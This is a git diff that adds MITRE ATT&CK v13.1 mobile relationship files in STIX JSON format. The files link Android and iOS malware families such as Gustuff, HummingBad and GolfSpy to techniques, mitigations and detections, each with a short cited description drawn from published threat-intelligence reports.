b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012.json new file mode 100644 index 0000000000000000000000000000000000000000..5d681390590194636a56253b70d8d328e530a9e7 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012.json 
@@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--9cc206dc-293e-46b2-b25f-a8ab307c717c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a28b2f2-ca0e-4d9f-9840-26e8ce944012", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--f296fc9c-2ff5-43ee-941e-6b49c438270a", + "target_ref": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb.json new file mode 100644 index 0000000000000000000000000000000000000000..756e07134fa34f5900e9a06ef5f500affde08026 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--c2dbd03b-c809-4654-8ed4-c53cb81ff869", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a2e4b01-e78f-4c05-b157-c6714d34fddb", + "type": "relationship", + "created": "2020-12-18T20:14:47.412Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.412Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has included native modules.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a610208-06af-425f-a9af-cd0899261e33.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a610208-06af-425f-a9af-cd0899261e33.json new file mode 100644 index 0000000000000000000000000000000000000000..319f2d4ffdabbb3fb4c6d3d288a926f2cdcad780 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a610208-06af-425f-a9af-cd0899261e33.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--143575da-d92d-4a7f-bb7d-aea23b1a502c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a610208-06af-425f-a9af-cd0899261e33", + "type": "relationship", + "created": "2020-09-11T15:45:38.450Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:45:38.450Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) can send SMS messages.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a737289-c62d-4c0a-a857-6d116f774864.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a737289-c62d-4c0a-a857-6d116f774864.json new file mode 100644 index 0000000000000000000000000000000000000000..794f9ee0fa53f1bdc6400ac1c734e7a8bf544523 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0a737289-c62d-4c0a-a857-6d116f774864.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--af395967-47dd-4edd-bc2c-3b6f81765a3c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0a737289-c62d-4c0a-a857-6d116f774864", + "type": "relationship", + "created": "2020-06-26T15:12:40.077Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:12:40.077Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) can abuse the accessibility service to read any text displayed on the screen.(Citation: ESET DEFENSOR ID)", + "relationship_type": "uses", + "source_ref": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070.json new file mode 100644 index 0000000000000000000000000000000000000000..5163a43be9580e8a9b7ea6f2a223cc8fd9d954c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c78528f8-0ab7-4ff6-a1af-0de4ad302bb9", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0b1aae4b-4dcd-41b6-a708-1441e5a24070", + "created": "2022-04-15T17:18:44.185Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gustuff](https://attack.mitre.org/software/S0406) obfuscated command information using a custom base85-based encoding.(Citation: Talos Gustuff Apr 2019)", + "modified": "2022-04-15T17:18:44.185Z", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d.json new file mode 100644 index 0000000000000000000000000000000000000000..264add20e392aba206fd103118e15f1b3e52081a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ca3f8c50-f095-4118-9aea-8acfec6a0048", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0b1e5e78-9ee1-4fc3-9fe7-dc069b59e77d", + "created": "2020-05-04T14:04:56.179Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Bread](https://attack.mitre.org/software/S0432) payloads have used several commercially available packers.(Citation: Google Bread)", + "modified": "2022-04-15T17:20:54.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651.json new file mode 100644 index 0000000000000000000000000000000000000000..ff50f4ccc40d9f2d2af50222fd43ed3109637238 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--4049c77a-33e9-4892-9e0d-27b409b371aa", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651", + "created": "2023-04-11T19:54:52.711Z", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T19:54:52.711Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can programmatically tap the screen or swipe.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2.json new file mode 100644 index 0000000000000000000000000000000000000000..0781c0fed446862fc696715a6192c067cb758232 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--f1ce5813-cf64-4c8d-b8a2-27ae0aa50841", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0b531974-1a28-4f16-ba34-1f7c8371b6b2", + "created": "2023-03-20T15:28:54.837Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:28:54.837Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--7827ced0-95e7-4d05-bdcf-0d8f2d37a3d3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1.json new file mode 100644 index 0000000000000000000000000000000000000000..085fc10559e78703395a7c175686adbc845f0915 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--c66e6a5f-7bb1-4744-9f46-0d4ba413b916", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0b5bfa77-51b4-41b4-ae03-88b585d143c1", + "type": "relationship", + "created": "2020-09-11T14:54:16.650Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.650Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) has been distributed in multiple stages.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253.json new file mode 100644 index 0000000000000000000000000000000000000000..68e980259216af37cee075b9b8824beab9edb92c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--25a8fe1c-dde3-4983-bd98-5bae1e93ba1c", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253", + "type": "relationship", + "created": "2020-12-31T18:25:05.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.178Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has fingerprinted devices to uniquely identify them.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bb6f851-4302-4936-a98e-d23feecb234d.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bb6f851-4302-4936-a98e-d23feecb234d.json new file mode 100644 index 0000000000000000000000000000000000000000..3084d6b49a587d50334dea03b7b7d5923b9d885c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bb6f851-4302-4936-a98e-d23feecb234d.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--61f10f6d-ebb5-4fee-a8ba-d2b9c886ef9b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0bb6f851-4302-4936-a98e-d23feecb234d", + "type": "relationship", + "created": "2020-06-02T14:32:31.777Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." + } + ], + "modified": "2020-06-02T14:32:31.777Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) exploits a WebKit vulnerability to achieve root access on the device.(Citation: Volexity Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349.json new file mode 100644 index 0000000000000000000000000000000000000000..c8c025ab7fd66e1afed166a8850fe96bfd57a894 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a3ef401c-9c84-4e71-b65a-4bacd2cf1652", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0bbe5936-04bf-4c9a-bb43-cd37f36c3349", + "created": "2020-10-29T19:01:13.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:44:31.187Z", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) has registered to receive 14 different broadcast intents for automatically triggering malware payloads. (Citation: Microsoft MalLockerB)", + "relationship_type": "uses", + "source_ref": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0.json new file mode 100644 index 0000000000000000000000000000000000000000..fe8cf0ec79835dd968fc3db141b706196a26b862 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--7cdf0361-ce5a-448d-b154-262f7f7882bf", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d70aaf50-29b7-4687-98ea-ffaa3fa858c0", + "type": "relationship", + "created": "2020-12-24T21:55:56.692Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.692Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has searched for specific existing data directories, including the Gmail app, Dropbox app, Pictures, and thumbnails.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891.json new file mode 100644 index 0000000000000000000000000000000000000000..7da7f5e8217307b620c81ede91fae49ffd12f5da --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--cef2e911-eda8-4611-a775-5a36ec96df83", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d87b468e-f610-4e95-8dfb-8cf029f0e891", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) can exploit unfixed vulnerabilities in older Android versions to root victim phones.(Citation: ArsTechnica-HummingBad)", + "relationship_type": "uses", + "source_ref": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a.json new file mode 100644 index 0000000000000000000000000000000000000000..610b62d38745f2c15443e544f8471183701cbf9e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--667a65b7-e4fb-4522-a2ed-10ebbb4ea0e2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--db34a2c8-01e0-4cd3-a497-0f4bca36812a", + "created": "2020-01-27T17:05:58.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:27:51.998Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) can obtain the device\u2019s call log.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e.json new file mode 100644 index 0000000000000000000000000000000000000000..3862b8aa532a5f59898aea5aac95c5bc45096d56 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e.json 
@@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--4b3e2654-7086-43ac-93fe-ba7f00ce7491", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ddfc5d8c-750d-424a-88d9-acc99bc5f69e", + "created": "2022-03-30T19:29:07.379Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Inform users that device rooting or granting unnecessary access to the accessibility service presents security risks that could be taken advantage of without their knowledge.", + "modified": "2022-03-30T19:29:07.379Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea.json new file mode 100644 index 0000000000000000000000000000000000000000..d1f76da7b8c937fc587837ded1ba2e361792db42 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--e0121f6c-0312-4fff-9d6c-0a8aea945bea.json 
